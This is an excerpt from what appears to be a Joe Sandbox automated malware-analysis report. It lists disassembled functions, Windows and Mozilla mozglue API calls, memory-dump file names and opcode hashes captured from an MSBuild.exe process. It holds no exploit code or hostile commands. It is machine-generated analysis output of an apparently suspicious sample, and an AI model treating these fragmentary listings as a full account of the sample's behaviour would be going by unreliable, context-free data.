                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: free$CriticalSection$EnterLeaveXbad_function_call@std@@memset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 700533648-0
                                                                                                                                                                                                                      • Opcode ID: 505d950b48e9b5ca9f3ec252faf0f4459ce219ec1f3292daa540102bbfadf08e
                                                                                                                                                                                                                      • Instruction ID: e2afaa3f5adb9e5960b01a7e9dd11d74d2532412605921a466c7dbd175f90329
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 505d950b48e9b5ca9f3ec252faf0f4459ce219ec1f3292daa540102bbfadf08e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 47210471A00624DBCB248F4ACA40BDEB7A9EF85358F268425ED095B700DB32FD06C7D2
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,80000001,80000000,?,6C8DD019,?,?,?,?,?,00000000,?,6C8CDA31,00100000,?), ref: 6C8BFFD3
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,?,?,6C8DD019,?,?,?,?,?,00000000,?,6C8CDA31,00100000,?,?), ref: 6C8BFFF5
                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,?,6C8DD019,?,?,?,?,?,00000000,?,6C8CDA31,00100000,?), ref: 6C8C001B
                                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,6C8DD019,?,?,?,?,?,00000000,?,6C8CDA31,00100000,?,?), ref: 6C8C002A
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$_invalid_parameter_noinfo_noreturnfree
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 826125452-0
                                                                                                                                                                                                                      • Opcode ID: 81b750e2625f1870d44a00727ee2d86af1a03bd9114b228f81b3a7292b8b8f12
                                                                                                                                                                                                                      • Instruction ID: aa1eeba2b0f4abb91ce4c1c67bd3059ec2665d74aa9a5a9a9497702765a2e932
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 81b750e2625f1870d44a00727ee2d86af1a03bd9114b228f81b3a7292b8b8f12
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 952106B6B002155BC7289F7C9DD48AFB7BAEBC53643250B38E425E7780EB709D0186D1
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 6C89BF00: ??0ios_base@std@@IAE@XZ.MSVCP140(?,?,?,?,6C8E7A3F), ref: 6C89BF11
                                                                                                                                                                                                                        • Part of subcall function 6C89BF00: ?init@?$basic_ios@DU?$char_traits@D@std@@@std@@IAEXPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@_N@Z.MSVCP140(?,00000000,?,6C8E7A3F), ref: 6C89BF5D
                                                                                                                                                                                                                        • Part of subcall function 6C89BF00: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(?,6C8E7A3F), ref: 6C89BF7E
                                                                                                                                                                                                                      • ?setprecision@std@@YA?AU?$_Smanip@_J@1@_J@Z.MSVCP140(?,00000012,00000000), ref: 6C8E7968
                                                                                                                                                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@_J@Z.MSVCP140(6C8EA264,6C8EA264), ref: 6C8E799A
                                                                                                                                                                                                                        • Part of subcall function 6C899830: free.MOZGLUE(?,?,?,6C8E7ABE), ref: 6C89985B
                                                                                                                                                                                                                      • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 6C8E79E0
                                                                                                                                                                                                                      • ??1ios_base@std@@UAE@XZ.MSVCP140 ref: 6C8E79E8
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_streambuf@??0ios_base@std@@??1?$basic_streambuf@??1ios_base@std@@??6?$basic_ostream@?init@?$basic_ios@?setprecision@std@@D@std@@@2@_J@1@_Smanip@_U?$_V01@_V?$basic_streambuf@free
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3421697164-0
                                                                                                                                                                                                                      • Opcode ID: 177cd6addfe22e49c031d188a0e4422a2c8924dee2170b63071153c4629dd42d
                                                                                                                                                                                                                      • Instruction ID: 51fb10def3240bba12eda37e336b10c5e17c9fcedbb257ca80e8ecc65b5562de
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 177cd6addfe22e49c031d188a0e4422a2c8924dee2170b63071153c4629dd42d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6B2139757083049FCB14DF18D985A9EFBF5EF89314F54882DE84A87351CB30A909CB92
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C89B4F5
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C89B502
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C89B542
                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C89B578
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2047719359-0
                                                                                                                                                                                                                      • Opcode ID: b536d793bee47bbe92eb56477316e05b8b0f2199aa5fd79bc206897908defa76
                                                                                                                                                                                                                      • Instruction ID: 0280f544dcc337e35d7cba1d25d1fd3b6f493d1ff03ed2933fbe40dd1bf0e809
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b536d793bee47bbe92eb56477316e05b8b0f2199aa5fd79bc206897908defa76
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5B11AF31A08B45C7D7318F6DC604761B3B5FF96318F249B1EE84953A01EBB1A2D5C794
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,6C88F20E,?), ref: 6C8C3DF5
                                                                                                                                                                                                                      • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(6C88F20E,00000000,?), ref: 6C8C3DFC
                                                                                                                                                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C8C3E06
                                                                                                                                                                                                                      • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000), ref: 6C8C3E0E
                                                                                                                                                                                                                        • Part of subcall function 6C8BCC00: GetCurrentProcess.KERNEL32(?,?,6C8831A7), ref: 6C8BCC0D
                                                                                                                                                                                                                        • Part of subcall function 6C8BCC00: TerminateProcess.KERNEL32(00000000,00000003,?,?,6C8831A7), ref: 6C8BCC16
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Process__acrt_iob_func$CurrentTerminatefputcfputs
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2787204188-0
                                                                                                                                                                                                                      • Opcode ID: 088a17fb3f45ff2ab25599dba1cb140931bb0257c28e38ff7dde965c042bf68c
                                                                                                                                                                                                                      • Instruction ID: 2f1c49873298668f81ba0c112878692b82e23c46a456463a5aedfde26b3e5859
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 088a17fb3f45ff2ab25599dba1cb140931bb0257c28e38ff7dde965c042bf68c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 46F0F8B1A002086BDB00AB58DD81DEB376DEB46668F150428FE0957741D736BE2A86F7
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8D205B
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(?,?,?,00000000,?,6C8D201B,?,?,?,?,?,?,?,6C8D1F8F,?,?), ref: 6C8D2064
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C8D208E
                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,00000000,?,6C8D201B,?,?,?,?,?,?,?,6C8D1F8F,?,?), ref: 6C8D20A3
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2047719359-0
                                                                                                                                                                                                                      • Opcode ID: 36b8b5f233346ff567b70c44055fd1bc49e348dd32486deb97350e88fe07555a
                                                                                                                                                                                                                      • Instruction ID: 45442b8c035d690fc9f657a3c33d47bc06f1287afd808de649b450f70461efb6
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 36b8b5f233346ff567b70c44055fd1bc49e348dd32486deb97350e88fe07555a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 57F090B1204A00DBC7219F16D88875BB7F8EF86324F25052EE50687710C775BC06CB95
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8D20B7
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(00000000,?,6C8BFBD1), ref: 6C8D20C0
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(00000000,?,6C8BFBD1), ref: 6C8D20DA
                                                                                                                                                                                                                      • free.MOZGLUE(00000000,?,6C8BFBD1), ref: 6C8D20F1
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2047719359-0
                                                                                                                                                                                                                      • Opcode ID: f9548bbe4468627d0756f3f5f0290c1de98a451f17f9a4223f19002351c4f6f2
                                                                                                                                                                                                                      • Instruction ID: 2615768e41c01f125d51f0785a0e05c7136072fe53168501b420b74984e7da93
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f9548bbe4468627d0756f3f5f0290c1de98a451f17f9a4223f19002351c4f6f2
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 84E0E531704A158BC7309F29990854EB7F9FF86214B210A2EE50A83B00D779BD4687D5
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(00000028,?,?,?), ref: 6C8D85D3
                                                                                                                                                                                                                        • Part of subcall function 6C89CA10: malloc.MOZGLUE(?), ref: 6C89CA26
                                                                                                                                                                                                                      • ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,?), ref: 6C8D8725
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Xlength_error@std@@mallocmoz_xmalloc
                                                                                                                                                                                                                      • String ID: map/set<T> too long
                                                                                                                                                                                                                      • API String ID: 3720097785-1285458680
                                                                                                                                                                                                                      • Opcode ID: 04cf9dccd56c61dc4b6364edd51148dff3515abdc6a43b8cd8fd3126239c1e9a
                                                                                                                                                                                                                      • Instruction ID: 69f2c2eec79f5b96b2c03a54cc74725992bce206ae09956eadf3b5d58b8b5bea
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 04cf9dccd56c61dc4b6364edd51148dff3515abdc6a43b8cd8fd3126239c1e9a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EF5155746046458FC711CF18C288A5ABBE1BF4A328F1AC99AE8595BB52C335FC45CFD1
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6C88BDEB
                                                                                                                                                                                                                      • ?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C88BE8F
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                      • API String ID: 2811501404-4108050209
                                                                                                                                                                                                                      • Opcode ID: eb4eae854d269370dd5150229e5048fd05aa96f94e073b2f4a9a5e2823556d38
                                                                                                                                                                                                                      • Instruction ID: a008c8816b80e0e312443fd6d2ccfaab4f57314afd7c035a83b660c0973cc6e3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eb4eae854d269370dd5150229e5048fd05aa96f94e073b2f4a9a5e2823556d38
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A141917150A749DFC721CF28C9819AFB7E4AFCA388F004E1DF98567A11D730D9498B92
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • calloc.MOZGLUE(?,?), ref: 6C88F19B
                                                                                                                                                                                                                        • Part of subcall function 6C8AD850: EnterCriticalSection.KERNEL32(?), ref: 6C8AD904
                                                                                                                                                                                                                        • Part of subcall function 6C8AD850: LeaveCriticalSection.KERNEL32(?), ref: 6C8AD971
                                                                                                                                                                                                                        • Part of subcall function 6C8AD850: memset.VCRUNTIME140(?,00000000,?), ref: 6C8AD97B
                                                                                                                                                                                                                      • mozalloc_abort.MOZGLUE(?), ref: 6C88F209
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CriticalSection$EnterLeavecallocmemsetmozalloc_abort
                                                                                                                                                                                                                      • String ID: d
                                                                                                                                                                                                                      • API String ID: 3775194440-2564639436
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C8C3D19
                                                                                                                                                                                                                      • mozalloc_abort.MOZGLUE(?), ref: 6C8C3D6C
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _errnomozalloc_abort
                                                                                                                                                                                                                      • String ID: d
                                                                                                                                                                                                                      • API String ID: 3471241338-2564639436
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C8944B2,6C90E21C,6C90F7F8), ref: 6C89473E
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C89474A
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                      • String ID: GetNtLoaderAPI
                                                                                                                                                                                                                      • API String ID: 1646373207-1628273567
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_DISABLE_WALKTHESTACK), ref: 6C8E6E22
                                                                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 6C8E6E3F
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • MOZ_DISABLE_WALKTHESTACK, xrefs: 6C8E6E1D
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Init_thread_footergetenv
                                                                                                                                                                                                                      • String ID: MOZ_DISABLE_WALKTHESTACK
                                                                                                                                                                                                                      • API String ID: 1472356752-1153589363
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 6C899EEF
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Init_thread_footer
                                                                                                                                                                                                                      • String ID: Infinity$NaN
                                                                                                                                                                                                                      • API String ID: 1385522511-4285296124
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SetEnvironmentVariableW.KERNEL32(MOZ_SKELETON_UI_RESTARTING,6C9051C8), ref: 6C8E591A
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(FFFFFFFF), ref: 6C8E592B
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • MOZ_SKELETON_UI_RESTARTING, xrefs: 6C8E5915
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CloseEnvironmentHandleVariable
                                                                                                                                                                                                                      • String ID: MOZ_SKELETON_UI_RESTARTING
                                                                                                                                                                                                                      • API String ID: 297244470-335682676
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • DisableThreadLibraryCalls.KERNEL32(?), ref: 6C89BEE3
                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(cryptbase.dll,00000000,00000800), ref: 6C89BEF5
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Library$CallsDisableLoadThread
